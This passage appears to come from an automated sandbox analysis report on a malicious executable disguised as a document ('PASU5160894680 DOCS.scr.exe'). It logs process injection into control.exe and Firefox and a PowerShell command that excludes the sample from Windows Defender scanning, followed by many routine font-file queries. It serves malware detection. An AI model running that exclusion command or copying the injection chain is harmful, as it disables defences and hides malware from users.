                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 8128Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\control.exeThread APC queued: target process: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: uFLByAWAOFbhtV.exe, 00000005.00000002.4132994444.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000000.1766717315.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132954868.0000000001AA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
